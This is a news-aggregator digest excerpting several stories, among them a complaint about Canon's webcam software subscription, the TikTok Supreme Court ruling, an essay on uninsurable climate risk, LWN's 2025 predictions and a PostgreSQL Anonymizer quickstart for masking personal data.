10 interesting stories served every morning and every evening.

1 955 shares, 61 trendiness

No, you can't use your $6,299.00 Camera as a Webcam. That will be $5 – Roman Zipp

Hey Hacker News! Thanks for the feed­back and sug­ges­tions, looks like many of you feel the same way. Also there’s now a RSS feed.

Companies squeez­ing every last penny out of their cus­tomers is no news. And Canon is no stranger.

Last year, I’ve bought a Canon G5 X II cam­era which I wanted to use mainly for tak­ing pic­tures at con­certs. For me, it was the per­fect match of fo­cal range (zoom) and sen­sor size (more light) for any com­pact cam­era I’ve com­pared.

Because I’m only us­ing this cam­era for a small range of events, it’s just col­lect­ing dust in the mean­time.

So, why don’t use it as a we­b­cam with my Macbook?

Admittedly, it did not cost me the $6300 from the ar­ti­cle’s ti­tle, much closer to $900. Nonetheless, every­thing I’m de­scrib­ing trans­lates to every other Canon cam­era model!

I’ve tried this at first in 2024 with ma­cOS 14, which did not work. I had sim­i­lar ex­pe­ri­ence with FUJIFILMs X Webcam soft­ware where ei­ther the cam­era will not get rec­og­nized by the soft­ware or the cam­era feed will freeze or sim­ply be not avail­able within other apps.

As of January 2025 with ma­cOS 15 Sequoia, these is­sues have been re­solved for me.

Well ac­tu­ally, only if you are able to down­load the soft­ware at all. Seems like their Microsoft IIS server is hav­ing some is­sues. The fol­low­ing er­ror page will be pre­sented to you, af­ter they asked you for your full le­gal name and mail ad­dress - with­out which you can not down­load the soft­ware.

So I’ve been re­ally ex­cited when I fi­nally found a down­load­able file on the Canon web­page which was not blocked by a faulty newslet­ter grift and saw the live feed of my cam­era!

Well the ex­cite­ment did­n’t last long since nearly every sin­gle set­ting is dis­abled if you’re us­ing the soft­ware with­out a pay­ing Canon ac­count.

No bright­ness ad­just­ments, no color cor­rec­tion, only 720p. Even in the paid ver­sion there does­n’t seem to be a white bal­ance ad­just­ment set­ting.

Canon will hap­pily take your credit card for you to pay a small monthly price of $4.99 per month or even a dis­counted $49.99 per year!

** The 30-day free trial is val­ued at $4.99 and can be can­celled at any time dur­ing the free trial pe­riod through your MyCanon Account Dashboard. After the free trial pe­riod, your sub­scrip­tion will au­to­mat­i­cally be rolled over into the an­nual or monthly non-re­fund­able, auto-re­new­able sub­scrip­tion se­lected upon en­roll­ment in the free trial, which can be can­celled at any time through your MyCanon Account Dashboard. The cur­rent avail­able sub­scrip­tion plans are $49.99/year or $4.99/month.

In a sup­port doc­u­ment, Canon lists all dif­fer­ences be­tween the free and paid ver­sion. So you can be very glad­ful, they al­low you to even con­nect the cam­era.

Software de­vel­op­ment is­n’t free, and I’m happy to pay for soft­ware I use reg­u­larly. However, Canon is a hard­ware com­pany, not a soft­ware com­pany, and they should—due to the lack of stan­dards—pro­vide soft­ware that al­lows you to use their cam­eras as in­tended. Aside from de­vel­op­ment costs, there’s no jus­ti­fi­ca­tion for a sub­scrip­tion model, par­tic­u­larly from a com­pany earn­ing nearly $3 bil­lion in profit.

So Canon will not al­low you to use your own cam­era on your own com­puter with your own ca­bles the way you in­tent to with­out pay­ing for an­other sub­scrip­tion.


Read the original on romanzipp.com »

2 874 shares, 1 trendiness

FFmpeg By Example

If you feel like this ex­am­ple could be im­proved, you may edit this ex­am­ple here.


Read the original on ffmpegbyexample.com »

3 743 shares, 83 trendiness

Supreme Court upholds TikTok ban, but Trump might offer lifeline

The Supreme Court on Friday up­held the law re­quir­ing China-based ByteDance to di­vest its own­er­ship of TikTok by Sunday or face an ef­fec­tive ban of the pop­u­lar so­cial video app in the U. S.

ByteDance has so far re­fused to sell TikTok, mean­ing many U. S. users could lose ac­cess to the app this week­end. The app may still work for those who al­ready have TikTok on their phones, al­though ByteDance has also threat­ened to shut the app down.

In a unan­i­mous de­ci­sion, the Supreme Court sided with the Biden ad­min­is­tra­tion, up­hold­ing the Protecting Americans from Foreign Adversary Controlled Applications Act, which President Joe Biden signed in April.

There is no doubt that, for more than 170 mil­lion Americans, TikTok of­fers a dis­tinc­tive and ex­pan­sive out­let for ex­pres­sion, means of en­gage­ment, and source of com­mu­nity,” the Supreme Court’s opin­ion said. But Congress has de­ter­mined that di­vesti­ture is nec­es­sary to ad­dress its well-sup­ported na­tional se­cu­rity con­cerns re­gard­ing TikTok’s data col­lec­tion prac­tices and re­la­tion­ship with a for­eign ad­ver­sary.”

TikTok’s fate in the U. S. now lies in the hands of President-elect Donald Trump,  who orig­i­nally fa­vored a TikTok ban dur­ing his first ad­min­is­tra­tion, but has since flip-flopped on the mat­ter. In December, Trump asked the Supreme Court to pause the law’s im­ple­men­ta­tion and al­low his ad­min­is­tra­tion the op­por­tu­nity to pur­sue a po­lit­i­cal res­o­lu­tion of the ques­tions at is­sue in the case.”

In a post on his so­cial me­dia app Truth Social, Trump wrote that the de­ci­sion was ex­pected and every­one must re­spect it.”

My de­ci­sion on TikTok will be made in the not too dis­tant fu­ture, but I must have time to re­view the sit­u­a­tion. Stay tuned!” Trump wrote.

Trump be­gan to speak more fa­vor­ably of TikTok af­ter he met in February with bil­lion­aire Republican megadonor Jeff Yass. Yass is a ma­jor ByteDance in­vestor who also owns a stake in the owner of Truth Social.

Trump will be in­au­gu­rated Monday, one day af­ter the TikTok dead­line for a sale. Tik­Tok CEO Shou Chew is one of sev­eral tech lead­ers ex­pected to be in at­ten­dance, seated on the dais.

In a video posted on TikTok, Chew thanked Trump for his com­mit­ment to work with us to find a so­lu­tion that keeps TikTok avail­able” in the U. S. He said use of TikTok is a First Amendment right, adding that over 7 mil­lion American busi­nesses use it to make money and find cus­tomers.

Rest as­sured, we will do every­thing in our power to en­sure our plat­form thrives as your on­line home for lim­it­less cre­ativ­ity and dis­cov­ery as well as a source of in­spi­ra­tion and joy for years to come,” he said.


Read the original on www.cnbc.com »

4 426 shares, 20 trendiness

Is the World Becoming Uninsurable?

I ask the ques­tion, is the world be­com­ing unin­sur­able?” not as an ex­pert on the in­sur­ance in­dus­try but as a home­owner who can no longer ob­tain hur­ri­cane in­sur­ance, and as an ob­server of long-term trends keenly in­ter­ested in the way global risks pile up ei­ther un­seen, de­nied or mis­in­ter­preted un­til it’s too late to mit­i­gate them.

The prob­a­bil­ity that we’re en­ter­ing an era of glob­ally higher risks is in­creas­ing, and this is aware­ness is vis­i­ble in head­lines such as these:

Home Losses From the LA Fires Hasten An Uninsurable Future’ (Time)

The Age of Climate Disaster Is Here: Preparing for a Future of Extreme Weather (Foreign Affairs)

We’re in a New Era’: How Climate Change Is Supercharging Disasters (New York Times)

This is not an ab­strac­tion, though many are treat­ing it as a pol­icy de­bate. As noted pre­vi­ously here, the in­sur­ance in­dus­try is not a char­ity, and in­sur­ers bear the costs that are in­creas­ing re­gard­less of opin­ions and pol­icy pro­pos­als. Insurers op­er­ate in the real world, and their de­ci­sions to pull out of en­tire re­gions, re­duce cov­er­age and in­crease pre­mi­ums are all re­sponses to soar­ing losses, a re­al­ity re­flected in these charts.

Losses rise with in­fla­tion, of course, but the losses are ris­ing far above back­ground in­fla­tion.

This raises a point few seem to pon­der: the world is­n’t sim­ply a po­lit­i­cal struc­ture, yet vir­tu­ally all the pro­posed so­lu­tions to every prob­lem are po­lit­i­cal or tech­no­log­i­cal in na­ture: we can solve this or that po­lit­i­cally, or with AI. That the pri­vate-sec­tor can trig­ger crises that have no po­lit­i­cal or tech­no­log­i­cal fix is on very few pun­dits’ radar.

Uninsurable risk is one such prob­lem.

Like vir­tu­ally all prob­lems, it’s been ap­proached as a prob­lem with a po­lit­i­cal so­lu­tion: the state or fed­eral gov­ern­ment can force in­sur­ers to con­tinue of­fer­ing poli­cies that put them on the hook for ad­di­tional cat­a­strophic losses, and / or be­come insurers of last re­sort.”

That nei­ther is a so­lu­tion to the ac­tual prob­lem is glossed over, be­cause as a so­ci­ety, we’ve be­come ac­cus­tomed to the idea that there is a po­lit­i­cal so­lu­tion to all prob­lems.

So the California au­thor­i­ties have pro­hib­ited in­sur­ers from can­celling cov­er­age within the fire zones:

California Insurance Commissioner has is­sued a manda­tory one-year mora­to­rium that will pro­hibit in­sur­ance com­pa­nies from en­act­ing non-re­newals and can­cel­la­tions of cov­er­age for home own­ers within the perime­ters or ad­join­ing ZIP Codes of the Palisades and Eaton fires in Los Angeles County re­gard­less of whether they suf­fered a loss. The mora­to­rium will ex­pire on Jan. 7, 2026.”

As for be­com­ing the insurer of last re­sort,” states are find­ing pro­vid­ing such cov­er­age is a fi­nan­cial black hole:

The wild­fires lay bare an in­sur­ance cri­sis in California.

Even be­fore this week’s wild­fires, of­fi­cials in the re­gion had warned that the California FAIR plan, a state-run in­surer of last re­sort that has in­creas­ingly be­come a main source of cov­er­age for res­i­dents, was one bad fire sea­son away from com­plete in­sol­vency.”

The FAIR plan’s ex­po­sure soared by 61 per­cent year-on-year to $458 bil­lion by the end of September, ac­cord­ing to Mr. Heleniak. Driving that is the flight of in­sur­ers from the California mar­ket: Between 2020 and 2022, pri­vate in­sur­ers dropped cov­er­age for 2.8 mil­lion home in­sur­ance cus­tomers, Mr. Heleniak wrote.

One prob­lem for in­sur­ers and Californians: Unlike hur­ri­canes, wild­fires are harder to model, ratch­et­ing up the risk.”

The prob­lems be­ing ex­posed do not lend them­selves to tidy po­lit­i­cal / pol­icy fixes that mag­i­cally re­turn the world to a past era of lower risks. Risks and losses can­not be ex­tin­guished, they can only be trans­ferred to oth­ers. This is the in­trin­sic limit of po­lit­i­cal fixes: we take the risks and losses and trans­fer them to oth­ers lack­ing the po­lit­i­cal power to con­test the trans­fer.

Or we trans­fer the risks and losses to the en­tire sys­tem, in­creas­ing the po­ten­tial for a sys­temic col­lapse.

Consider the re­al­i­ties of act­ing as the insurer of last re­sort.” The in­sur­ance in­dus­try is built on a foun­da­tion of a hand­ful of re-in­sur­ance com­pa­nies that pro­vide in­sur­ance to in­sur­ers should losses over­whelm the ex­pected norms.

If re-in­sur­ers de­cide not to of­fer cov­er­age due to high risks or risks that can­not be es­ti­mated with any re­li­a­bil­ity, then the insurer of last re­sort” is self-in­sur­ing all po­ten­tial losses, mean­ing if the house will cost $500,000 to re­build, $500,000 in cash must be kept in re­serve, be­cause there is no guar­an­tee a lender will risk of­fer­ing a mort­gage with­out con­ven­tional in­sur­ance.

If the state or fed­eral gov­ern­ment of­fers an open check­book–we’ll pay any and all losses, no ques­tions asked–then those ul­ti­mately pay­ing these as­tro­nom­i­cal bills–the tax­pay­ers–will rea­son­ably ask: why are we sub­si­diz­ing peo­ple to re­build in places that are clearly no longer hab­it­able due to the prob­a­bil­i­ties of an­other fire, flood or hur­ri­cane?

In other words, the en­tire idea of be­ing an insurer of last re­sort” is based on an un­lim­ited sup­ply of money to fund losses that no longer make fi­nan­cial sense. If re­build­ing a house de­stroyed in a 100 year flood” once made sense, now that there’s a 100 year flood” every five years, re­build­ing in that lo­cale no longer makes sense. So why should tax­pay­ers ab­sorb the costs of this se­lec­tive blind­ness to the re­al­i­ties of ris­ing global risks?

This is not the first time cli­mate change has im­pacted civ­i­liza­tion in ways that are not vis­i­ble to or ac­cepted by those liv­ing through the tran­si­tion.

The early 1600s were an era of global crises, con­flict and col­lapse, largely dri­ven by cooler weather that re­duced crop yields and thus the caloric in­take of peo­ple, leav­ing them more prone to suc­cumb­ing to dis­ease and more will­ing to over­throw their rulers. For their part, this made rulers more will­ing to risk war and make hasty, ill-ad­vised de­ci­sions that ac­cel­er­ated the crises.

The book Global Crisis: War, Climate Change and Catastrophe in the Seventeenth Century by Geoffrey Parker of­fers a com­pre­hen­sive overview of these dy­nam­ics.

Another era in which risks rose with­out par­tic­i­pants re­al­iz­ing that global cir­cum­stances were pres­sur­ing economies and so­ci­eties ad­versely nearly brough the Roman Empire to its knees: the Third Century Crisis, a pe­riod in Roman his­tory, span­ning roughly from 235 to 284 AD, where the Roman Empire nearly col­lapsed due to a se­ries of in­ter­nal civil wars, bar­bar­ian in­va­sions, eco­nomic in­sta­bil­ity, and a chaotic suc­ces­sion of em­per­ors.”

The emer­gence of poly­cri­sis fu­eled by cli­mate change and glob­al­ized trade (which de­liv­ers in­sta­bil­ity and pan­demics along with goods) has been ably de­scribed by Kyle Harper, in this Smithsonian mag­a­zine ar­ti­cle

How Climate Change and Plague Helped Bring Down the Roman Empire

and in his 2019 book, The Fate of Rome: Climate, Disease, and the End of an Empire.

Ours is an era soaked in the hubris of no lim­its”: there are no lim­its on hu­man in­ge­nu­ity, and so there are no lim­its on what we can do in the real world. Limits are anath­ema in to­day’s zeit­geist, and so the idea that Nature im­poses lim­its that man­i­fest as fi­nan­cial lim­its–go ahead and print $100 tril­lion to fund every no lim­its” pro­posal, but that will de­stroy the value of all the money” we’re cre­at­ing to fund no lim­its”–is un­ac­cept­able.

In times less al­ler­gic to lim­its and more will­ing to face fi­nan­cial re­al­i­ties, peo­ple ac­cepted that it made no sense to build more than sea­sonal shacks along coast­lines prone to dev­as­ta­tion. To give up per­ma­nent res­i­dences with air con­di­tion­ing and all the lux­u­ries of mod­ern life be­cause these no longer make fi­nan­cial sense is a taboo topic.

I have long held that the world has been blessed with 60+ years of ben­e­fi­cial weather, and so we’ve been blessed with 60+ years of agri­cul­tural sur­pluses glob­ally. It seems likely this era is end­ing, and we’re as yet un­pre­pared for this con­tin­gency: food might be­come not just scarce but chron­i­cally scarce.

As I’ve noted pre­vi­ously, diesel-fu­eled ro­bots can roam the field zap­ping weeds with lasers, but what’s the point of that tech­nol­ogy if there’s no rain or high winds and heavy rain de­stroyed the har­vest? That there are lim­its on our tech­no­log­i­cal pow­ers is also taboo. Diesel does­n’t de­liver the right amount of rain, and nei­ther does AI.

It was­n’t co­in­ci­dence that the Bastille was torn down just as the price of bread spiked to un­af­ford­abil­ity. Scarcities, short­ages, ris­ing prices and the il­lu­sions of no lim­its” all re­in­force each other. And since the par­tic­i­pants ei­ther don’t grasp or refuse to ac­cept the na­ture of the new era of ris­ing risk, they seek scape­goats in what they do grasp: pol­i­tics, poli­cies, and the trans­fer of losses and risk to oth­ers.

As I’ve of­ten sought to ex­plain, trans­fer­ring losses and risk to the en­tire sys­tem seems to ex­tin­guish the risk by di­lut­ing it in a larger pool of re­sources. So the losses trig­gered by the Global Financial Crisis of 2008 were ab­sorbed by the en­tire fi­nan­cial sys­tem and econ­omy, pools of re­sources large enough to di­lute the losses to the point that the il­lu­sion that the risk had van­ished could be sus­tained.

But risk is­n’t ex­tin­guished, it’s only trans­ferred, and how it man­i­fests is based on com­plex in­ter­ac­tions, de­pen­dency chains, over-op­ti­miza­tion and the ero­sion of re­silience. The risks of a global fi­nan­cial melt­down did­n’t van­ish in 2009; those risks were trans­ferred to the sys­tem as a whole, a trans­fer that con­tin­ues to this day, as risk piles up in a sys­temic fash­ion few see, or dare to rec­og­nize.

This same re­luc­tance to rec­og­nize sys­tem risk is ev­i­dent in global sup­ply chains, the global food sup­ply, and every other tightly bound, highly in­ter­con­nected sys­tem we de­pend on.

Is the world be­com­ing unin­sur­able? The an­swer is yes, in two ways. One is the re­al­ity that much of what we take as our God-given right no longer makes fi­nan­cial sense, and even­tu­ally the costs of cling­ing onto a sta­tus quo that no longer aligns with real-world lim­its will have to be cov­ered by tak­ing re­sources and cap­i­tal from some­thing else we take as our God-given in­her­i­tance.

It boils down to the clas­sic sce­nario in which we want three things but are lim­ited to choos­ing two. Once sys­tem risks start man­i­fest­ing, we’ll be re­duced to sav­ing one and sac­ri­fic­ing two. If we refuse to ac­cept that triage, we’ll end up sav­ing noth­ing.

The other way the world is be­com­ing unin­sur­able is much of what we take for granted–abun­dant, af­ford­able re­sources, prod­ucts, food and fuel, for ex­am­ple–is not guar­an­teed, and can­not be in­sured by po­lit­i­cal or tech­no­log­i­cal means. This won’t stop us from pur­su­ing the hubris­tic ex­tremes of no lim­its,” but that pur­suit will has­ten the col­lapse made in­evitable by trans­fer­ring all risks to the sys­tem. The pool of re­sources is not in­fi­nite, and so the risks can no longer be di­luted.

Highlights of the Blog

The Easy Credit, High Interest Rate Swindle 1/9/25

I Quit! The Tsunami of Burnout Few See 1/7/25

High Interest Rates Are Healthy, Low Rates Are Poison 1/6/25

Best Thing That Happened To Me This Week

We opened and grated some of our co­conuts af­ter a long hia­tus, and baked co­conut short­bread cook­ies and a co­conut pie to share with friends.

The miss­ing cook­ies were sam­pled for quality con­trol pur­poses” (heh).

Few peo­ple make these treats nowa­days be­cause there is no way to ob­tain the re­sults with­out a lot of la­bor.

What’s on the Book Shelf

The Fate of Rome: Climate, Disease, and the End of an Empire.

Global Crisis: War, Climate Change and Catastrophe in the Seventeenth Century.

From Left Field

NOTE TO NEW READERS: This list is not com­prised of ar­ti­cles I agree with or that I judge to be cor­rect or of the high­est qual­ity. It is rep­re­sen­ta­tive of the con­tent I find in­ter­est­ing as re­flec­tions of the cur­rent zeit­geist. The list is in­tended to be pe­rused with an open, crit­i­cal, oc­ca­sion­ally amused mind.

Many links are be­hind pay­walls. Most pay­walled sites al­low a few free ar­ti­cles per month if you reg­is­ter. It’s the New Normal.

The Mismeasure of Money

The Grand Macro Strategy” Of 2025: What US Economic Statecraft Will Look Like Under Trump

The rise and rise of Maye Musk: China’s love af­fair with Elon Musk’s mother

The Telepathy Tapes (via Richard M.)

Husserl vs. Heidegger: Two Takes on Phenomenology

He’s anti-democ­racy and pro-Trump: the ob­scure dark en­light­en­ment’ blog­ger in­flu­enc­ing the next US ad­min­is­tra­tion

The Depletion Paradox (via Cheryl A.)


America, China, and the Death of the International Monetary Non-System (Russell Napier)

I found trea­sures in a ship­wreck.

As Flames Consume Architectural Gems, a Hit to Old California’

You should never play to win but so as not to lose. Think what moves will be quick­est beaten, avoid mak­ing them, and make what­ever move will take most time to beat. In learn­ing any ac­com­plish­ment, in con­trol­ling one’s own con­duct, and in gov­ern­ing a na­tion, the same rule ap­plies.” Yoshida Kenko


Read the original on charleshughsmith.substack.com »

5 288 shares, 11 trendiness

Learn Yjs by Jamsocket

Welcome to Learn Yjs — an in­ter­ac­tive tu­to­r­ial se­ries on build­ing re­al­time col­lab­o­ra­tive ap­pli­ca­tions us­ing the Yjs CRDT li­brary.

This very page is an ex­am­ple of a re­al­time col­lab­o­ra­tive ap­pli­ca­tion. Every other cur­sor in the gar­den above is a real live per­son read­ing the page right now. Click one of the plants to change it for every­one else!

Learn Yjs starts with the ba­sics of Yjs, then cov­ers tech­niques for han­dling state in dis­trib­uted ap­pli­ca­tions. We’ll talk about what a CRDT is, and why you’d want to use one. We’ll get into some of the pit­falls that make col­lab­o­ra­tive ap­pli­ca­tions dif­fi­cult and show how you can avoid them. There will be ex­plorable demos and code ex­er­cises so you can get a feel for how Yjs re­ally works.

Here’s an ex­am­ple of an ex­plorable demo. Each box be­low rep­re­sents a client — a sep­a­rate com­puter run­ning an app that uses Yjs. When you in­ter­act with ei­ther client, the changes are au­to­mat­i­cally synced to the other one. You can con­trol the la­tency with the slider on the top left to see how clients would in­ter­act over a net­work.

Great — let’s get started! Click on the but­ton be­low to visit Lesson 1.

Learn Yjs is a pro­ject by Jamsocket, a plat­form for build­ing re­al­time apps. The live cur­sors and mul­ti­player gar­den on this page are pow­ered by Y-Sweet, our open source Yjs server with built-in per­sis­tence.

The web­site is built with Astro. The in­ter­ac­tive demos and ex­er­cises are built with React and Yjs.


Read the original on learn.yjs.dev »

6 257 shares, 15 trendiness

Thoughts On A Month With Devin – Answer.AI


Read the original on www.answer.ai »

7 253 shares, 10 trendiness

Some things to expect in 2025 [LWN.net]

Did you know…?

LWN.net is a sub­scriber-sup­ported pub­li­ca­tion; we rely on sub­scribers to keep the en­tire op­er­a­tion go­ing. Please help out by buy­ing a sub­scrip­tion and keep­ing LWN on the net.

We are re­li­ably in­formed by the cal­en­dar that yet an­other year has be­gun.

That can only mean one thing: the time has come to go out on a limb with a

se­ries of ill-ad­vised pre­dic­tions that are al­most cer­tainly how

the year will ac­tu­ally go. We have to try; it’s tra­di­tional, af­ter all.

Read on for our view of what’s com­ing and how it may play out.

The ex­ten­si­ble sched­ul­ing class (sched-ext) will be a game changer. Already we have seen, in 2024, how the abil­ity to load a CPU sched­uler from user space as a set of BPF pro­grams has un­leashed a great deal of cre­ativ­ity; that was be­fore sched-ext was part of a re­leased ker­nel. In 2025, this fea­ture will start show­ing up in more dis­tri­b­u­tions, and more peo­ple will be able to play with it. The re­sult will be a flood of new sched­ul­ing ideas, each of which can be quickly tested (and im­proved) on real sys­tems. Some of those ideas will re­sult in spe­cialty sched­ulers in­cluded with fo­cused dis­tri­b­u­tions (systems for gam­ing, for ex­am­ple); oth­ers, hope­fully, will even­tu­ally find their way into the ker­nel’s EEVDF sched­uler.

Code writ­ten in Rust will land in the ker­nel at an in­creas­ing rate

over the course of the year as a re­sult of the in­creased avail­abil­ity of ab­strac­tions and greater fa­mil­iar­ity with the lan­guage in the ker­nel com­mu­nity. The Rust code that has been merged so far is mostly in­fra­struc­ture and proofs of con­cept; in 2025, we’ll see Rust code that end users will run — but they may never no­tice. The num­ber of un­sta­ble lan­guage fea­tures needed by the ker­nel will drop sig­nif­i­cantly as those fea­tures are sta­bi­lized by the Rust com­mu­nity.

Another XZ-like back­door at­tempt will come to light. Existing code bases have been scoured for at­tacks sim­i­lar to those used against XZ; lit­tle has been found, but that does not mean that there are not other on­go­ing ef­forts, us­ing dif­fer­ent tech­niques, out there. The po­ten­tial pay­off for a gov­ern­ment agency or other suit­ably well-funded or­ga­ni­za­tion is sim­ply too high for all of them to ig­nore; some­body is surely try­ing some­thing.

Increasingly, sin­gle-main­tainer pro­jects (or sub­sys­tems, or pack­ages)

will be seen as risky by their users. Security in­ci­dents like the XZ back­door at­tempt will be part of that, but a pro­ject with a sin­gle main­tainer is also sub­ject to all of the other prob­lems as­so­ci­ated with burnout and in­suf­fi­cient time to do the job prop­erly. Such a pro­ject will never be as re­li­able as one would like.

A ma­jor pro­ject will dis­cover that it has merged a lot of AI-generated

code, a fact that may be­come ev­i­dent when it be­comes clear that the al­leged au­thor does not ac­tu­ally un­der­stand what the code does. We de­pend on our de­vel­op­ers to con­tribute their own work and to stand be­hind it; large lan­guage mod­els can­not do that. A pro­ject that dis­cov­ers such code in its repos­i­tory may face the un­pleas­ant prospect of re­vert­ing sig­nif­i­cant changes.

Meanwhile, we will see more fo­cused ef­forts to cre­ate truly free

gen­er­a­tive AI sys­tems, per­haps in­clud­ing the cre­ation of one or more foun­da­tions to sup­port the cre­ation of the mod­els. This work will in­clude a great deal of in­no­va­tion fo­cused on re­duc­ing the re­sources that these mod­els need, dri­ven by the much lower level of re­sources avail­able. The re­sult­ing code will help to in­crease the ac­cess to — and con­trol over — these sys­tems, with un­known re­sults; not every­body will use them for good pur­poses.

We may also see the launch of one or more foun­da­tions aimed specif­i­cally

at pro­vid­ing sup­port for main­tain­ers. Even com­pa­nies that con­tribute en­thu­si­as­ti­cally to free-soft­ware pro­jects of­ten balk at sup­port­ing the main­tainer role, de­spite the fact that pro­jects don’t work with­out main­tain­ers. But per­haps some of those com­pa­nies can be en­cour­aged to sup­port a sep­a­rate en­tity that promises to solve — or at least im­prove — the main­tainer sit­u­a­tion for spe­cific pro­jects of in­ter­est. The main­tainer role will still be se­verely un­der-sup­ported at the end of the year, though.

Foundations sup­port­ing free-soft­ware work will con­tinue to strug­gle

in 2025, though, con­tin­u­ing the trend seen in 2024. The com­ing year does not look like a time of in­creas­ing gen­eros­ity in gen­eral, so or­ga­ni­za­tions that de­pend on the gen­eros­ity of oth­ers will have their work cut out for them.

There will be more cloud-based prod­ucts turned to bricks by man­u­fac­tur­ers that go bank­rupt or sim­ply stop car­ing. Surveillance and data-breach prob­lems with cloud-con­nected prod­ucts will also hap­pen with dis­cour­ag­ing reg­u­lar­ity over the course of the year; see the sto­ries on air-fryer

sur­veil­lance or the Volkswagen

elec­tric-ve­hi­cle data leak for re­cent ex­am­ples. Perhaps 2025 will be the year when aware­ness of the down­sides of ex­ten­sive cloud con­nec­tiv­ity will be­come more wide­spread. There is an op­por­tu­nity for free-soft­ware al­ter­na­tives, such as Home

Assistant, to make in­roads by demon­strat­ing a bet­ter way to man­age per­sonal data. Truly tak­ing ad­van­tage of that op­por­tu­nity will re­quire a user fo­cus that is not al­ways our com­mu­ni­ty’s strong point, but one can al­ways hope.

As a corol­lary to the above, more fully open hard­ware will be­come

avail­able in 2025. The OpenWrt One, which hit the mar­ket in 2024, quickly sold out its ini­tial pro­duc­tion run. There is clearly an ap­petite for hard­ware that can be truly owned by its pur­chasers, and our com­mu­nity has the skills and tools needed to make such hard­ware. Expect some in­ter­est­ing pro­jects to launch in the com­ing year.

Distributions for mo­bile de­vices will see a resur­gence in in­ter­est

in the com­ing year. In the early days of Android, it was com­mon to re­place a phone ven­dor’s soft­ware with CyanogenMod or an­other de­riv­a­tive; it was the best way to get the most con­trol and func­tion­al­ity out of the de­vice. As Android im­proved, many of us stopped go­ing to that ex­tra ef­fort. Increasing pri­vacy and se­cu­rity con­cerns, paired with in­creas­ing qual­ity on the part of the al­ter­na­tive dis­tri­b­u­tions, will start to drive some users away from stock Android once again.

Finally, global bel­liger­ence will make it­self felt in our com­mu­nity. The world as a whole does not ap­pear to be headed in a peace­ful di­rec­tion; even if new con­flicts do not spring up, the ex­ist­ing ones will be enough to af­fect the de­vel­op­ment com­mu­nity. Developers from out-of-fa­vor parts of the world may, again, find them­selves ex­cluded, re­gard­less of any per­sonal cul­pa­bil­ity they may have for the evil ac­tions of their gov­ern­ments or em­ploy­ers.

This is be­ing writ­ten in the US, where pol­i­tics have taken a dis­tinct us ver­sus them” turn; such trends are not lim­ited to this coun­try, though. That at­ti­tude runs strongly against the foun­da­tions our com­mu­nity was built on; we are build­ing sys­tems for every­body, ac­cept­ing the con­tri­bu­tions of any­body who is will­ing and able to help. We have shown that it is pos­si­ble to build a global com­mu­nity that can ac­com­plish amaz­ing things and change the world. This com­ing year would be a good one in which to show that we are still ca­pa­ble of do­ing that. As some strive to tear our in­sti­tu­tions down, we can work to make our in­sti­tu­tions stronger than ever.

LWN will be­gin its 27th year of pub­li­ca­tion in January; we are one in­sti­tu­tion that is proud to have been a part of the Linux and free-soft­ware com­mu­ni­ties for so long, and we have no in­ten­tion of stop­ping now. Whatever hap­pens in 2025, we’ll be here to write about it and, hope­fully, spread some light and un­der­stand­ing. And, of course, we’ll re­turn to these pre­dic­tions in December to have a good laugh at just how far off they turned out to be.

Best wishes to all of you; LWN would not be what it is with­out our read­ers. We wish an es­pe­cially happy and pros­per­ous 2025 to our sub­scribers; with­out you, we would not have been around for all these years.


Read the original on lwn.net »

8 207 shares, 14 trendiness

PostgreSQL Anonymizer

PostgreSQL Anonymizer is an ex­ten­sion to mask or re­place

per­son­ally iden­ti­fi­able in­for­ma­tion (PII) or com­mer­cially sen­si­tive data from a Postgres data­base.

The pro­ject has a de­clar­a­tive ap­proach of anonymiza­tion. This means you can

de­clare the mask­ing rules us­ing the PostgreSQL Data Definition Language (DDL) and spec­ify your anonymiza­tion pol­icy in­side the table de­f­i­n­i­tion it­self.

The main goal of this ex­ten­sion is to of­fer anonymiza­tion by de­sign. We firmly be­lieve that data mask­ing rules should be writ­ten by the peo­ple who de­velop the ap­pli­ca­tion be­cause they have the best knowl­edge of how the data model works. Therefore mask­ing rules must be im­ple­mented di­rectly in­side the data­base schema.

Once the mask­ing rules are de­fined, you can ap­ply them us­ing 5 dif­fer­ent

mask­ing meth­ods :

Each method has its pros and cons. Different mask­ing meth­ods may be used in dif­fer­ent con­texts. In any case, mask­ing the data di­rectly in­side the PostgreSQL in­stance with­out us­ing an ex­ter­nal tool is cru­cial to limit the ex­po­sure and the risks of data leak.

In ad­di­tion, var­i­ous Masking Functions are avail­able : ran­dom­iza­tion, fak­ing, par­tial scram­bling, shuf­fling, noise or even your own cus­tom func­tion!

Finally, the ex­ten­sion of­fers a panel of de­tec­tion func­tions that will try to guess which columns need to be anonymized.


docker run –name anon_quick­start –detach -e POSTGRES_PASSWORD=x $ANON_IMG

docker exec -it anon_quick­start psql -U post­gres

Step 1. Create a data­base and load the ex­ten­sion in it


ALTER DATABASE demo SET ses­sion_pre­load­_li­braries = anon’

\connect demo

You are now con­nected to data­base demo” as user postgres”.


SELECT 153478 AS id,

Sarah’ AS first­name,

Conor’ AS last­name,

0609110911’ AS phone

SELECT * FROM peo­ple;

id | first­name | last­name | phone

153478 | Sarah | Conor | 0609110911

Step 3. Create the ex­ten­sion and ac­ti­vate the mask­ing en­gine


ALTER DATABASE demo SET anon.trans­par­en­t_­dy­nam­ic_­mask­ing TO true;



GRANT pg_read­_al­l_­data to skynet;

SECURITY LABEL FOR anon ON COLUMN peo­ple.last­name

IS MASKED WITH FUNCTION anon.dum­my_last_­name()’;


IS MASKED WITH FUNCTION anon.par­tial(phone,2,$$******$$,2)’;

\connect - skynet

You are now con­nected to data­base demo” as user skynet”

SELECT * FROM peo­ple;

id | first­name | last­name | phone

153478 | Sarah | Stranahan | 06******11

With PostgreSQL Anonymizer we in­te­grate, from the de­sign of the data­base, the prin­ci­ple that out­side pro­duc­tion the data must be anonymized. Thus we can re­in­force the GDPR rules, with­out af­fect­ing the qual­ity of the tests dur­ing ver­sion up­grades for ex­am­ple.

— Thierry Aimé, Office of Architecture and Standards in the French

Public Finances Directorate General (DGFiP)

Thanks to PostgreSQL Anonymizer we were able to de­fine com­plex mask­ing rules in or­der to im­ple­ment full pseu­do­nymiza­tion of our data­bases with­out los­ing func­tion­al­ity. Testing on re­al­is­tic data while guar­an­tee­ing the con­fi­den­tial­ity of pa­tient data is a key point to im­prove the ro­bust­ness of our func­tion­al­i­ties and the qual­ity of our cus­tomer ser­vice.

I just dis­cov­ered your post­gresql_anonymizer ex­ten­sion and used it at my com­pany for anonymiz­ing our user for lo­cal de­vel­op­ment. Nice work!

If this ex­ten­sion is use­ful to you, please let us know !

We need your feed­back and ideas ! Let us know what you think of this tool, how it fits your needs and what fea­tures are miss­ing.

